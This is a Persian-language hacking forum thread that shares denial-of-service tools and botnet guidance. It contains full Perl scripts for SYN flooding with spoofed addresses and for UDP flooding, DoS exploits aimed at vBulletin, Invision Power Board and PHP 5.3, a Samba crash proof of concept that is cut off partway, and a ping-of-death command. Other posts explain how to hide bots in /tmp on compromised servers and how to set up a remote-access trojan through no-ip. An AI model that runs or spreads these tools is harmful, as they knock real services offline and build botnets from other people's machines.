[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]

DOS Php 5.3.x

//#DOS Php 5.3.x
//################################################## #########################
//#Title: Dos Php 5.3.0
//#Vendor: [Only registered and activated users can see links]
//#Tested On Php 5.3.0 On Windows xp Sp3 And Redhat
//################################################## #########################
//#AUTHOR: ITSecTeam
//#Email: [Only registered and activated users can see links]
//#Website: [Only registered and activated users can see links]
//#Forum : [Only registered and activated users can see links]
//#Original Advisory: [Only registered and activated users can see links]
//#Thanks: Pejvak,M3hr@nS,r3dm0v3,am!rkh@n
//################################################## #########################
//#
//# Exploit
//################################################## #########################
<?php
$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
for($i=0;$i<2;){
$buff=bcpow($junk, '3', 2);
$buff=null;
}
//Coded By Pejvak;
?>

با سلام
می شه در مورد طرز استفاده این DDoser یه توضیح بدین
برای DDOs یک سایت ما چگونه باید از آن استفاده کنیم ؟

این برای dos کردن سایت هایی است که از Php 5.3.x استفاده می کنند
برای این کار باید دسترسی لوکال داشته باشی

اینم یکی دیگه......

DOcumant
([Only registered and activated users can see links])
اینم لینک اصلی مقاله برای اینکه بتونیذ فایلها رو دانلود کنید!
مقاله و فایل ها رو هم ضمیمه می کنم برای راحتی کار
این مقاله به زبان انگلیسی و بسیار جالب هست!

اینم مقاله فارسی برای آشنایی با Botnet

سلام تو خوده فایل rar هست
بازم می گم چون شاید از لینوکس استفاده کنی

[Only registered and activated users can see links]

اینم یه مقاله که نمی شه گفت ولی جالبه در مورده botnet تقریبا کامل و جالب هست!
که یه نمایه کلی از Botnet به ما میده و فارسی هم هست!

اینم یه سورس به زبان c همراه با توضیحات (برای حملات smurf )

اینم یه نرم افزار تحت پرل برای حملات تکذیب سرور


فایل مورد نظر پیوست شد


ممنونم 0261 !
سورس، ماژول، و یا حتی دامنه(!) خواستی همینجا بنویس. اینقدر ایمیل نده... لطفاً! ;)
یه کارت قرمز گرفتید امیدوارم دیگه تکرار نشه!
M.Prince

خوب اینم یه سورس دیگه به زبان c در محیط لینوکس
حمله از نوع smurf

اینم Bot برای ویندوز

با سلام :cool:

دوستان برای دریافت کد ثبت پی ام بدید

سلام دوستان ممنون از فعالیتتون
هر کی بخواد اینجا پست بده که دیگه....
به صورت خصوصی به ایشون پیغام بدید .ممنون

یک اسکریپت به زبان پرل (کاره یکی از بچه هاست)
حمله از نوع udp flooder
و یکی دیگه به زبتن برای IIS 5.1 قدیمی ولی حداقل با نحوه نوشتن این طور برنامه ها به زبتن c رو آشنا می شید!

یه bot برای ویندوز و یه مقاله توپ برای تقریبا نصب بیشتره متود های Dos و Ddos رو گفته!
مقاله تو vip سایتی که تو مقاله نوشته بوده از یکی دوستان رسیده به دسته ما و فارسی هستش

برای درک واقعی حملات DOS و DDOS و ساختار انها و نحوه جلوگیری از انها به شدت این مقاله رو توصیه میکنم :x

زبان انگلیسی ولی همچین مقاله ای به زودی ترجمه میشه توسط من ولی این رو حتما دانلود کنید.

پسورد : ashiyane.org

خوب دوستان این Botnet کار باهاش کم و راحت هست کمی دقت می خواد برای ویندوز نوشته شده در کل جالب هست
پیوست:چون فایل exe هست هیچگونه مسولیتی را پذیرا نمی باشیم!
Help هم داره !

اینم یک اکسپلویت جدید برای سیستم انجمن ساز ویبولتون
ای اسکریپ ورژن 2 هست و میشه گفت یک اسکریپ قوی هست
(پچ هم نمیشه ... :ii )
به زبان پرل

یه Botnet دیگه !

از اسمش مشخصه .. نیازی به توضیح نداره..
==============================================
Invision power board 0-day denial of service 2
==============================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm SeeMe member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


# Invision power board 0-day denial of service 2 100% works..
#
# It works on all versions! can DOS the whole server!
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/([Only registered and activated users can see links])//eg;
for ($i=0; $i<10; $i--)
{
$user="seeme".$rand.$i;
$data = "adsess=&";
$len = length $data;
$foo = "POST ".$dir."index.php [Only registered and activated users can see links]".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-[Only registered and activated users can see links]".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 /\n\n";
exit();
};
################################################## ##############
# Greetz to Inj3ct0r Crew


# Inj3ct0r.com [2010-04-23]

سلام تو این فیلم نحوه تنظیم botnet رو میبینید حجمش بالا بود منم Dial up هستم نشد ضمیمه کنم .
part 1 ([Only registered and activated users can see links])
part 2 ([Only registered and activated users can see links])
part 3 ([Only registered and activated users can see links])
part 4 ([Only registered and activated users can see links])
part 5 ([Only registered and activated users can see links])

Botnet مورده استفاده هم می تونید از تو همین تاپیک بردارید !
خوب این فیلم ها بسیار جالب هستند که کار خودم هم نیست و می تونم بگم واقعا کامل هستند !

ساختار حملات dos و Ddos
این مقاله هم به زبان انگلیسی هستش

;)

=============================================
vBulletin 0-day Denial Of Service Exploit (2)
=============================================



1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm SeeMe member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


# VBulletin 0-day denial of service II
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/([Only registered and activated users can see links])//eg;
for ($i=0; $i<10; $i++)
{
$user="vbulletin".$rand.$i;
$data = "s=&";
;
$len = length $data;
$foo = "POST ".$dir."index.php [Only registered and activated users can see links]".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-[Only registered and activated users can see links]".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "Fire";
}
print "nn";
system('ping $host');
sub usage {
print "tusage: n";
print "t$0 n";
print "tex: $0 127.0.0.1 /forum/n";
print "tex2: $0 127.0.0.1 / (if there isn't a dir)nn";
exit();
};

###############################################
# Created by SeeMe
# Greetz to In3ct0r.com Team


# Inj3ct0r.com [2010-04-18]

----------------------------
Edited
ببخشید ... این xpl رو علی آقا زحمتشو کشیده بود .. گذاشته بود .. من ندیدم :D

شرح حالی از برخی حملات dos
این مقاله به زبان English هستش

خوب دیگه بیشتر عملی کار می کنیم !
در این فیلم با نحوه ی DOs کردن wp آشنا می شید!
کاره یکی از دوستان هستش!
اسکریپت مربوطه رو هم گذاشتم در ضمن تست هم شده

یه Botnet دیگه!

دو تا فیلم در مورد Botnet البته 1 فیلم دو دو بخش
part 1 ([Only registered and activated users can see links])
part 2 ([Only registered and activated users can see links])
این فیلم ها هم کار یه ترک هست در کل نمایی کلی و جالب از Botnet رو نشون می ده!

سلام دوستان از امروز سیایت جدید برای این تاپیک لحاظ می شود!
خوب دیگه در این تاپیک دسترنج خودمون رو می خوریم..........
d.o.s مخفف denial of service
خوب این نوع حملات برای از کار انداختن سرویس دهی به کاربران است و انواع بسیار گوناگونی داره
مثلا بیشتر شرکتهای بزرگ متقاضی افرادی هستند که بتونند این نوع حملات برای اون ها انجام بده مثلا رقیبهای خودشون......
خوب حتما می دونید که در یک ارتباط معمولی از این قرار است!
client :syn
server:syn/ack
client :?
خوب همونطور که می بینید کلاینت جوابی دیگه نمی ده و همینطور ادامه پیدا می کنه این درخواستهای بی پاسخ تا اجازه ی سرویس دهی به دیگر کاربران داده نشه
که به این حملات syn flood می گن!
اولین نوع این حملات ping of death هست که با استفاده ازcmd انجام می شه ولی خوب دیگه الان انجام نمی شه
خوب تو این فیلم این نوع حمله رو با هم میبینیم !
حمله به اینصورت هست
ping ip -t -l 64000 خوب انقدر درخواست به هدف فرستاده می شه تا down بشه که هر در خواست به هر اندازه ای کتر از 46000 بایت هست!
خوب دوستان سوالاته خودشون رو بپرسن pm و تشکر و .........
در قسمتهای بعدی با انواع برنامه ها آشنا می شیم!

سلام دوستان تو این فیلم یک نوع دیگه حملات flood رو با هم کار می کنیم به کمک یک برنامه که کاره یه هکر ترک هست !
برنامه با استفاده از prاکسی اتک می کنه و قابلیت افزودن زامبی هم داره!
فیلم گویا یه همه چیز هست
فیلم هم کاره خودم هست از این به بعد تمام فیلم ها ساخته خودمون هست !
در ضمن دوستان تاپیک داره خلوت می شه نظر سوال؟
دوستان برای اجرای برنامه به
Microsoft .NET Framework 2.0 نیاز دارید !
در ادامه با دیگر حملات و برنامه ها آشنا می شید!

سلام دوستان مدتی نبودم ولی امروز ترکوندم براتون
در این فیلم یه انجمن vb رو dos می کنیم +اسکریپت مربوطه و stop کردن حمله
در پست های بعدی شما با دیگر برنامه ها آشنا می کنم!

سلام دوستان مدتی نبودم ولی امروز ترکوندم براتون
در این فیلم یه انجمن vb رو dos می کنیم +اسکریپت مربوطه و stop کردن حمله
در پست های بعدی شما با دیگر برنامه ها آشنا می کنم!

Script این کو ؟ توی فایل نیست lo1ad

بیا اینم فایل در ضمن هیچگونه مسئولیتی به گردن من و آشیانه نمی باشد!

سلام عزیزان طی در خواست برخی از عزیزان که گفتند botnet چیه یه توضیح مختصری می دم!
bot یعنی ربات
net هم که شبکه هستش
خوب یعنی روبات شبکه (اینترنت) یعنی آماده دریافت دستور و انجام کار
خوب من botnet ها رو پیش خودم دو گروه تقسیم می کنم
گروه 1:استفاده از irc
گروه 2:استفاده از cpanel
خوب باید نوع تکنولوژی اون رو هر جور که حال می کنیم انتخاب کنیم!
برای استفاده تز irc خوب یه نمونشو تو همین خوده آشیانه هستش zombie های ما (قربانی) می آند طبق اون برنامه ای که ما براشون نوشتیم به یک channel خاص در irc وصل می شند ما هم می تونیم رو یه اون pass بزاریم و نحوه پخشش هم باز هم به نوع برنامه نویسی ما بستگی داره که برای win بنویسیم یا linux اگر برای win باشه zombie های ما سرور های win و کلاینت ها هستند!
خوب اگر برای لینوکس باشه که خوب لینوکس دیگه و هنگامی که به کانال مورد نظر وصل شدند مثل روبات منتظر دستور می مونند که ما دستور بدیم فلان جا رو بخوابون

=======================
برای استفاده از cpanel که بهترین نوع Botnet هستش باید ما مثل نصب یک cms اونو تنظیم کنیم و بعد از نصب باید botnet که معمولا با زبانهای c و perl وassembly نوشته می شوند رو تنظیم کنیم برای بر قراری ارتباط با cpanel بعدش کافی که ما در شل هایی که از سرور ها میگیریم و می تونیم command ران کنیم اجرا کنیم که بهترینش اینه که در دایرکتوری tmp/ اونو نصب کنیم تا از دید پنهان باشد! وبعد از برقراری ارتباط ما می تونیم از طریق cpanel به Bot هایه خودمون فرمان بدیم
==============================
به نظر من کسی کمی سرچ و وفقت بزاره می تونه به botnet دسترسی پیدا کنه !
================================================== =
در ضمن کاره باتنت به همین Ddos ختم نمی شه ! کارهای بیشتری داره
یکی همیشگی کردن دسترسی برا ما البته در اونایی که cpanel دارند من فعلا دیدم!

گشتم ، نصب هم کردم حمله بد تر شد !
کلی ای پی بلوک شده اما حمله تموم نشد :o

SERVER t چیه کمی مشخصات بده ، بهترین کار برا جلوگیری از DDOS مدیر on باشه IP های مشکوک رو ببنده این Antiddoser ها بدتر Ram رو پر میکنن اگه سرور win داری از mmc استفاده کن ./

به اون صورت نمي توني جلوي اين حملات رو بگيري
همان طور كه دوست عزيز مون گفت ايپي هاي مشكوك رو ببين

خوب اگر راهنمایی کامل می خوایی اگر سرورت لینوکس هستش بهترین ابزار همون iptables هستش به نظر من بلد باشی باهاش کار کنی از همه چیز بهتره !
اگر بتونی سایت هم از روی Vps بر داری که چه بهتر می شه!

یکی از متدهایی که به ندرت در اینترنت برای حملات Ddos صحبت شده است . متد Bandwidth Exhaustion Attack and Traffic Bottlenecks یا همان خستگی ترافیک و از بین بردن پهنای باند هست . همان متدی که آشیانه 14-15 ماه پیش یکی از تیم های بزرگ امنیتی ایرانی را مجبور به شارژ چند باره پهنای باند کرد و مدیر این تیم بدون متوجه شدن نوع حمله بازدید بالای فرومش را باعث این کار دانست و خبری زد که سایت به اصطلاح Digg شده است . با این اسکریپت که به زبان Perl نوشته شده است و در اکثر تیم ها و سایت ها به صورت Priv8 یاد میشود میتوانید در سرور هایی که حتی فرمان wget بسته شده است حمله خودتان را انجام دهید .

#!/usr/bin/perl -w

#wget script -> For those annoying servers without wget >_<

#Coded by illuz1on

use LWP::Simple;

$url = $ARGV[0];

$file = $ARGV[1];



if(@ARGV < 2){

print "Wget Script - > illuz1on < -\\n\\n";

print "Usage - > perl wget.pl \\n";

print "Example - > perl wget.pl [Only registered and activated users can see links] /tmp/exploit.c\\n";

exit;

}

getstore($url, $file) || die "Cant Download File: $!\\n";

mes();

dl();

ex();

sub mes {

print "+--------------+\\n";

print "| WgetScript |\\n";

print "| illuz1on |\\n";

print "| v1.0 |\\n";

print "+--------------+\\n\\n";

}

sub dl {

print "[~]Downloading...\\n";

sleep 1;

print "

* Downloaded...\\n";


print "

* $url Was Saved To $file...\\n\\n";


}

sub ex {

print "+-------------------+\\n";

print "| Coded By illuz1on |\\n";

print "| G0t-Root |\\n";

print "| H4ckY0u |\\n";

print "+--------------------+\\n";

sleep 2;

exit;

}

سلام دوستان در این آموزش در مورد حملات smurf حرف می زنیم !
این نوع حملات خطرناکترین هستند و اینم بگم که اگر طرف کار بلد باشه با یه اینترنت dial-up می تونه یه سرور رو بخوابونه البته به toolz هم بستگی داره!
کارش این طوره که می آد تعداد زیادی از packet های icmp رو به سمت سرور می فرسته که خوب مزیتش اینه که اگر شبکه(که ما داریم در مورده سرور حرف می زنیم) ایم packet ها رو فیلتر نکنه وقتی ما این packet ها رو می فرستیم هر پکت 100 تا می شه و بسیار جالب خوب اگر این متود با متود spoof قاطی بشه دیگه می ترکونه متود spoof هم کارش اینه که می آد این پکت هارو از طرف قربانی ارسال می کنه و ip قربانی هست این کار رو برای ما انجام می ده!
یه toolz هم می ذارم در قسمت ابزار ها که با c برای linux نوشته شده! کارش توپه!

یک ابزار برای smurf که کارش توپه در ضمن یه نکته یادم رفت بگم به شبکه هایی که پکت های ICMP
رو فیلتر نکرده باشه amplifier می گند که باعث چند برابر شدن پکت ها می شه (بسیار جالبه)!
در ضمن دوستان تشکر شما ما رو بیشتر تحریک می کنه که بریم تو کاره zone-h
:x

تو این فیلم در مورده حملات Iframe بحث می کنیم !

خوب این برنامه هم که یه چیزی شبیه همون botnet خودمون هست در ویندوز کارش خیلی خوبه
فقط آنتی بهش گیر می ده ولی بازم میشه باهاش کارایی کرد !
فیلمشم میزارم!

خوب دیگه بیشتر عملی کار می کنیم !
در این فیلم با نحوه ی DOs کردن wp آشنا می شید!
کاره یکی از دوستان هستش!
اسکریپت مربوطه رو هم گذاشتم در ضمن تست هم شده
دوست عزیز من این exploit تست کردم حدود 15 گذاشتم تا کارشو انجام بهده ولی target هیچ مشکلی براش پیش نیومد
مشکل از چیه؟

دوست عزیز من این exploit تست کردم حدود 15 گذاشتم تا کارشو انجام بهده ولی target هیچ مشکلی براش پیش نیومد
مشکل از چیه؟

درود ...
دوست عزیز اسکریپت کار میکنه ... شما مطمئنید که تارگتتون Wordpress بوده ؟ cigar
اینم یه نمونه دیگه با اجازه M.prince heart

بله کاملا درسته این اسکریپت انقدر با ظرافت نوشته شده که با loCAL می تونید تارگت رو بخوابونیید!
ممنون از این دوسته عزیزمنو heart

آقا من تمام کارارو رو درست انجام میدم دستور که میدم بهش
یه چن مین میگزره و یه نوشته آبی میاد quite میده مشکل از چیه؟

شما از همون برنامه ای که Cair3x نوشته استفاده کن!
[Only registered and activated users can see links]

یک عدد Botnet

یک عدد Botnet

botnet!!!!!!!!!!!!!!!

منظور شما فکر کنم یک اسکریپت bot بود.

ساختار حملات dos و ddos
این مقاله هم به زبان انگلیسی هستش

عزیزم پسورد می خواد !!!:(

سلام بعید می دونم پسورد بخواد ولی یل ashiyane یا 13721372 هستش!

بله درسته حرفه شما ولی اینطوری راحتتر هستم من! تا اینکه بیام بگم اسکرسیپت Bot
البته دقت کنید Botnet هم درسته چون معنیش اینو می گه یعنی رباط شبکه !

سلام بعید می دونم پسورد بخواد ولی یل ashiyane یا 13721372 هستش!
بدشانسی هیچکدام نتونست باز کنه !!!:(

از اساتید عزیز کسی برنامه ای مثل tcpkill ( لینوکس ) در محیط ویندوز سراغ داره که بتونه در یک LAN پکتهای TCP مشخصی را Kill کنه ؟
با تشکرفراوان:-S

google search ([Only registered and activated users can see links])

تا الان کسی مشکل نداشته نمی دونم مشکل شما چی هستش که باز نمی شه!

google search ([Only registered and activated users can see links])
هنوز مورد ویندوزی پیدانکرده ام ...:(

[Only registered and activated users can see links]

سلام عزیزان مقاله ای فارسی در مورده حملات dos

اینم یه ابزار به اسم سیانور خودم هنوز تست نکردم!

#!/usr/bin/perl

#

# Synner.pl ******** PRIV8*********

#

# Other Spoof-DoS tool written by nuTshell

# <carloslack at gmail dot com>

#

# Description:

# This small tool is similar many other tcp syn flooders out there.

# It works sending syn tcp packets to destination host:port,

# spoofing it's own ip addresses by sending randon source host:port

# packets.

# Be carefull, becouse you really need strong link otherwise

# you'll get f*. Unlike panic.pl , synner.pl consumes much

# bandwidth resources.

#

# Required:

# Install Net::RawIP from cpan or get it's .tar,gz from somewhere.

# It's up to you.

#

# This tool does SPOOF your ip.

#

# Run it as ROOT (Net::RawIP needs).

# Usage: ./synner.pl <ip> <port> <time>

#

# Greetz goes to: Shorgen, hexdump, Codak, khz, spidersoft,

# Barros, xgc, btaranto, Acid-Warz, F-117...

#

# WARNING: Never tested in real world :}

#



#Make sure to get and install this module from cpan:

use Net::RawIP;



#Display help message:

sub usage() {

die "Use $0 <ip> <port> <time>\n";

}



#Function to control synner's execution time:

sub get_time() {

$finaltime = time;

$endme = $finaltime-$begintime;

}



#Bit useless...:

if (@ARGV>3) {&usage}



$ipdest = $ARGV[0] or &usage;

$destport = $ARGV[1] or &usage;



#Time is required to avoid endless execution (keep in mind that synner eats bandwidth):

$time = $ARGV[2] or &usage;



#Source port of our packets, include as many as you want:

@tmpport = (1756,1026,1739,4055,2001,3055,1999,2873,20000,547 6,9132,6000,9000,1234);



#2 arrays that will give us randon ip addr:

@iparray_round1 = (1,2);

@iparray_round2 = (0,1,2,3,4,5,6,7,8,9);



print "[!] Synpack.pl spoof-DoS tool written by nuTshell\n";

print "[!] You better have huge link :)\n";

print "[!] Time: $time\n";

print "[!] Destination victin-> $ipdest:$destport\n";



#Set $packet as handle of our raw packets:

$packet = new Net::RawIP;



#Get start time:

$begintime = $^T;



#Call get_time():

get_time();



while($endme < $time) {



#Now build randon xxx.xxx.xxx.xxx:

for ($z=0;$z<4;$z++) {



#I use number 2 for every first numbers of each octet:

for($I=0;$I<1;$I++) {

$ip .= 2;

}

#Here i keep two options for every second numbers of each octet:

for($kick=0;$kick<1;$kick++) {

$iparray_round1 = $iparray_round1[rand(@iparray_round1)];

$ip .= $iparray_round1;

}

#For all the last third of each octets i use range between 0<->9:

for($you=0;$you<1;$you++) {

$iparray_round2 = $iparray_round2[rand(@iparray_round2)];

$ip .= $iparray_round2;

}



#Insert dot between each octet:

$ip .= ".";

}



#The last one dot must be erased:

chop($ip);



#Routine to create/send spoofed packets, thanks to Net::RawIP:

$tmpport = $tmpport[rand(@tmpport)];

$packet->set(

{

ip => { saddr => $ip, #Victin ip

daddr => $ipdest #Victin port

},



tcp => { source => $tmpport, #Source ip(Spoofed and randomized)

dest => $destport, #source port(Randomized)

psh => 1,

ack => 0,

syn => 1,

data => '31337'

}

}

);



#Send it:

$packet->send(0,1);



print " From-> $ip:randon_port\r";



#Reset last ip for new one:

$ip = '';



#Call get_time():

get_time();



}

#That's all folks!

print "\nDone!\n";

#eof

ابزاری برای spoof بشه یه فیلم هم درست می کنم (خیلی جا ها اینو پریوات می دونند !)
کارش خوبه!

#!/usr/bin/perl
##############

# udp flood.
##############

use Socket;
use strict;

if ($#ARGV != 3) {
print "flood.pl <ip> <port> <size> <time>\n\n";
print " port=0: use random ports\n";
print " size=0: use random size between 64 and 1024\n";
print " time=0: continuous flood\n";
exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);


print "Flooding $ip " . ($port ? $port : "random") . " port with " .
($size ? "$size-byte" : "random size") . " packets" .
($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;

send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}

اینم یه اسکریپت پرل برای حملات flood البته از نوع udp

این بات برای گرفتن دستور به کانالهای irc وصله می شه!
تو پست بعدی یکی می ذارم که با cpanel کار کنه!

سلام دوستان تو این پست باهم آموزش نرمافزار (MeTuS-Delphi-2.8 ) رو با هم یاد بگیرید!
اول بگم که آنتی به این ابزار گیر می ده!
اول از هر چیزی به سایت no-ip.com می ریم و یه اکانت درست می کنیم !
بعد به قسمت add host می ریم و یه ایپی اضافه می کنیم با یه دامنه!
[Only registered and activated users can see links]
خوب حالا برنامه رو اجرا می کنیم و در قسمت تب Server Builder رفته و در قسمت Host اسم هاستی که ایجاد کردیم رو وارد می کنیم و Build رو می زنیم .
[Only registered and activated users can see links]
بعد به قسمت Connection رفته و راست کلیک می کنیم و گزینه Listen رو انتخاب می کنیم و پورتی که در سرور برای وصل شدن انتخاب کردیم به حالت لیسن می ذاریم!
[Only registered and activated users can see links]
و حالا کافی سرور رو اجرا کنیم
توصیه :سرور رو در سیستم خودتون اجرا نکنید!
برای ثبت نام هم از وpن یا پرokسی استفاده نکنید و یا اگر استفاده می کنید Ip اصلیتون رو برای ریجستر استفاده کنیم!

اینم یه bot دیگه که از cpanel استفاده می کنه ویکم خلاقیت و حوصله می خواد تا بتونید راش بندتزید!

اسکریپت CW که به زبان c نوشته شده قدرت بسیار بالایی داره کار عربهاست

Samba <=3.4.7 and Samba <= 3.5.1

Proof of concept
----------------

To trigger the uninitialised variable read issue, the following Python
proof of concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:
sys.exit('Usage: python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\xaa"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x 00\x00\x00\x00"
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x 52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x 1a\x45\x4e\x49"
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x 4f\x53\x4f\x46"
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x 2e\x30\x33\x00"
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x 57\x69\x6e\x64"
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x 67\x72\x6f\x75"
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x 2e\x32\x58\x30"
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x 31\x00\x02\x4e"
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x01\xa3"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x ca\x00\x00\x00"
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x 00\x00\x00\x00"
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x 99\x00\x36\xed"
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\x fa\x89\x56\x5b"
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\x d3\x2e\x17\xad"
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x 23\xe0\x69\x41"
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x 00\x74\x00\x72"
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x 00\x4e\x00\x54"
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x 00\x6f\x00\x77"
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x 00\x33\x00\x38"
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x 00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x 00\x34\x00\x2e"
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x 00\x00\x01\x00"
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x 00\x2e\x00\x31"
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x 00\x30\x00\x34"
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x 00\x3f\x3f\x3f"
"\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))


To trigger the null pointer dereference issue this Python proof of
concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:
